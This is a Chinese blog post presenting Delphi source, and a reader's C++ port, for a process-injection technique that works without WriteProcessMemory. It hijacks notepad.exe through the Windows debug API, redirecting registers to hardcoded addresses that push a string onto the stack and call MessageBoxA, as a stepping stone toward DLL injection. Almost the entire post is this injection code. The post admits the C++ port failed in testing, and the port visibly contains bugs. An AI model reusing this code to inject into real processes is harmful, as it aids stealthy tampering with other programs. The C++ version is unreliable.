如何堆疊推入路徑(Injection without WPM)

作者: knowlet -
修改暫存器達到無須使用 WPM 寫入路徑注入 DLL 的效果
本文特點在於如何在堆疊中推入檔案字串路徑..

感謝網友 Tobyworks 轉換成 C++,Win7 x86 RAD Studio XE2 編譯成功,測試失敗

Delphi:
unit prjBypass;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, tlhelp32;

type
TForm1 = class(TForm)
btn2: TButton;
lbl1: TLabel;
procedure btn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
function OpenThread(dwDesiredAccess: DWord;
bInheritHandle: Bool;
dwThreadId: DWord): DWord; stdcall; external 'kernel32.dll';
function DebugSetProcessKillOnExit(KillOnExit: boolean):boolean; stdcall;external 'kernel32.dll';
var
Form1: TForm1;

implementation

{$R *.dfm}

function HexToInt(HexNum: string): LongInt;
begin
Result:=StrToInt('$' + HexNum);
end;

function WaitForData(dDebug:TDebugEvent):Boolean;
begin
Result := True;
repeat
WaitForDebugEvent(dDebug,INFINITE);
if dDebug.dwDebugEventCode = EXCEPTION_DEBUG_EVENT then
if dDebug.Exception.ExceptionRecord.ExceptionCode = EXCEPTION_SINGLE_STEP then
break;
if dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT then begin
Result := False;
Exit;
end;
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
until 1=3;
end;

procedure TForm1.btn2Click(Sender: TObject);
var
pi: TProcessInformation;
si: TStartupInfo;
context:_CONTEXT;
dDebug:TDebugEvent;
dwOEP, dwESP, dwEAX, dwECX, dwEBP, dwEDI, dwEBX, dwEDX:DWORD;
begin
FillMemory( @si, sizeof( si ), 0 );
si.cb := sizeof( si );
context.ContextFlags:=CONTEXT_FULL or CONTEXT_FLOATING_POINT or CONTEXT_DEBUG_REGISTERS;
If CreateProcess(Nil,PChar('notepad.exe'),Nil, Nil, False,DEBUG_PROCESS, Nil, Nil, si, pi ) then begin

repeat
WaitForDebugEvent(dDebug,INFINITE);
if dDebug.dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT then
break;
if dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT then
Exit;
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
until 1=3;

//Set BP on OEP
GetThreadContext(pi.hThread,context);
dwOEP := context.EAX;
context.Dr0 := dwOEP;
context.Dr7 := 1;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//We are at OEP
//Save Registers, change EIP to push eax
GetThreadContext(pi.hThread,context);
if context.Eip = dwOEP then begin
context.Dr0 := 0;
context.Dr7 := 0;
//Save Registers
dwEBP := context.Ebp;
dwEAX := context.Eax;
dwEBX := context.Ebx;
dwECX := context.Ecx;
dwEDX := context.Edx;
dwESP := context.Esp;
dwEDI := context.Edi;
context.Eax := HexToInt('00796568');
context.Eip := HexToInt('01007505');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
end else
Exit;

if WaitForData(dDebug) = false then
Exit;

//Mov eax, esp
//Push 0
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01002290');
context.Eax := context.Esp;
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//push eax
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01001B18');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//push eax
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01001B18');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);


if WaitForData(dDebug) = false then
Exit;

//Push 0
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01002290');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//mov eax, messagebox
//call eax
GetThreadContext(pi.hThread,context);
context.Eax := DWORD(GEtProcAddress(LoadLibrary('user32.dll'),'MessageBoxA'));
context.Eip := HexToInt('01002969');
context.Dr0 := context.Eip + 2;
context.Dr7 := 1;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

GetThreadContext(pi.hThread,context);
//Save Registers
context.Eax := dwEAX;
context.Ebx := dwEBX;
context.Ecx := dwECX;
context.Edx := dwEDX;
context.Esp := dwESP;
context.Edi := dwEDI;
context.Eip := dwOEP;
context.Ebp := dwEBP;
context.Dr0 := 0;
context.Dr7 := 0;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

//Detach Process
DebugSetProcessKillOnExit(False);
end;
end;

end.

C++
//---------------------------------------------------------------------------

#include 
#pragma hdrstop

#include 
#include 
#include "prjBypass.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
 : TForm(Owner)
{
}
//---------------------------------------------------------------------------

long HexToInt(String HexNum)
{
 return StrToInt("$" + HexNum);
}
//---------------------------------------------------------------------------

bool WaitForData(TDebugEvent dDebug)
{
 while (1)
 {
  WaitForDebugEvent(&dDebug, INFINITE);
  if (dDebug.dwDebugEventCode == EXCEPTION_DEBUG_EVENT) {
   //if (dDebug.Exception.ExceptionRecord.ExceptionCode == EXCEPTION_SINGLE_STEP)
    //break;
  }
  if (dDebug.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) {
   return false;
  }
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);
 }
 return true;
}

//---------------------------------------------------------------------------

void __fastcall TForm1::Button1Click(TObject *Sender)
{
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 _CONTEXT context;
 _DEBUG_EVENT dDebug;
 DWORD dwOEP, dwESP, dwEAX, dwECX, dwEBP, dwEDI, dwEBX, dwEDX;

 FillMemory(&si, sizeof(si), 0);
 si.cb = sizeof(si);
 context.ContextFlags = CONTEXT_FULL | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS;
 if (CreateProcess(NULL, TEXT("notepad.exe"), NULL, NULL, false, DEBUG_PROCESS,
      NULL, NULL, &si, &pi))
 {
  while (1)
  {
   WaitForDebugEvent(&dDebug, INFINITE);
   if (dDebug.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
    break;
   }
   if (dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT) {
    return;
   }
   ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
  }

  //Set BP on OEP
  GetThreadContext(pi.hThread, &context);
  dwOEP = context.Eax;
  context.Dr0 = dwOEP;
  context.Dr7 = 1;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug)) {
   return;
  }

  //We are at OEP
  //Save Registers, change EIP to push eax
  GetThreadContext(pi.hThread, &context);
  if (context.Eip == dwOEP) {
   context.Dr0 = 0;
   context.Dr7 = 0;
   //Save Registers
   dwEBP = context.Ebp;
   dwEAX = context.Eax;
   dwEBX = context.Ebx;
   dwECX = context.Ecx;
   dwEDX = context.Edx;
   dwESP = context.Esp;
   dwEDI = context.Edi;
   context.Eax = HexToInt("00796568");
   context.Eip = HexToInt("01007505");
   context.EFlags = context.EFlags | 0x0100;
   SetThreadContext(pi.hThread, &context);
   ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);
  }
  else
   return;

  if (!WaitForData(dDebug)) {
   return;
  }

  //Mov eax, esp
  //Push 0
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01002290");
  context.Eax = context.Esp;
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //push eax
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01001B18");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug. dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //push eax
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01001B18");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

        //Push 0
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01002290");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //mov eax, messagebox
  //call eax
  GetThreadContext(pi.hThread, &context);
  context.Eax = (DWORD)GetProcAddress(LoadLibrary(TEXT("user32.dll")),"MessageBoxA");
  context.Eip = HexToInt("01002969");
  context.Dr0 = context.Eip + 2;
  context.Dr7 = 1;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  GetThreadContext(pi.hThread, &context);
  //Save Registers
  context.Eax = dwEAX;
  context.Ebx = dwEBX;
  context.Ecx = dwECX;
  context.Edx = dwEDX;
  context.Esp = dwESP;
  context.Edi = dwEDI;
  context.Eip = dwOEP;
  context.Ebp = dwEBP;
  context.Dr0 = 0;
  context.Dr7 = 0;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  //Detach Process
  DebugSetProcessKillOnExit(false);
 }
}
//---------------------------------------------------------------------------

留言

張貼留言

本月最夯

偷用電腦,怎知?事件檢視器全記錄!(開機時間、啟動項時間...)

作者: knowlet -
圖片
想知道你的電腦在你不使用的時候是否被開機過嗎?小朋友是不是趁家長不在家的時候偷偷完電腦啊?常常懷疑家裡或公司的電腦被人偷偷開來亂弄東西,可以用下面的方法檢查一下電腦在什麼時候有被開機、登入使用過。 Windows 系統裡的「事件檢視器」會紀錄很多電腦的相關資訊,包含什麼時候開機、登入、登出,或者系統發生哪些錯誤或其他的特殊事件等等,通通會紀錄在「事件檢視器」的日誌中。如果你只是想知道電腦什麼時候開機過的話,可以很輕易的從「事件檢視器」裡查到電腦確實的開機、關機時間。
閱讀完整內容